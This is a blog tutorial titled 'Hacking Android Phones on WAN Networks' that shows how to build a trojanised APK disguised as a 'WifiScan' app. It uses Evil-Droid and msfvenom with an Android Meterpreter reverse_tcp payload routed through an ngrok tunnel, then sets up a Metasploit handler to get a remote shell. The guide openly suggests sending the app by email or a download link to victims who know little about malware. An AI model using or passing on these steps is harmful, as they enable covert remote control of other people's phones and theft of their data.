Hacking Android Phones on WAN Networks

Android phones are easy to hack, sort of .. well if the phone is running an old version of android and it’s no longer updated or patch there is a chance to hack it, but if the phone is running the latest system it’s not easy to hack unless you have some access to it, i mean if you can get your hands of it for just some time or the owner of the phone have no idea about malwares or installing apps from untrusted source, in this case there is a good chance we can hack their phone by sending or installing the hacking app in their phone.

In this tutorial we’re going to use Evil-Droid for the first part and then MSFCONSOLE for the second part, so let’s start by downloading Evil-Droid from this LINK :

We start the app running:

chmod +x evil-droid

./evil-droid

We chose number 4 so we can create the apk file with custom icon and in the next screen we put our ip address and then the listening port, by default it’s 4444 leave it like this:

And then we gave it any name i will chose WifiScan:

The next screen we’re going to choose the payload type android/meterpreter/reverse_tcp:

In this screen keep it as default:

It will open up the file browser navigate to the icon folders in the Evil-Droid directory and choose the wifi icon:

It’s going to do some stuff, when it’s over will gave this screen, keep it to default values:

Now we send the apk file to the phone and install it as any normal apk program:

After installation is finished open the file and wait for a connection back to your terminal:

And just like that we got a reverse shell, type help and enjoy the possibilities you can do, BUT wait what if the phone we hacking is not on the same network as this example, what if it’s in another country how to get this to happen ?

Well in this case we’re going to use Ngrok and Metasploit (I’ve tried Evil-Droid but had some problems):

We’re going to download Ngrok and then run it

chmod +x ngrok

./ngrock tcp 9090

Now we create apk file with msfvenom –p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=11920 R>Wifi.apk

Now we start Metasploit by typing msfconsole and put the commands like this:

use /multi/handler

set payload android/meterpreter_reverse_tcp

set lhost 127.0.0.1

set LPORT 9090

set payload android/meterpreter/reverse_tcp

Type exploit and wait for connection from the phone (transfer the apk file to the phone or in this case we send it via email or download link or any other means):

With Ngrok we can make a port forwarding to our machine, most of the wifi routers todays doesn’t have this feature or it’s hard to configure it on your router, but with Ngrok it’s easier to use.

2 thoughts on “Hacking Android Phones on WAN Networks”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s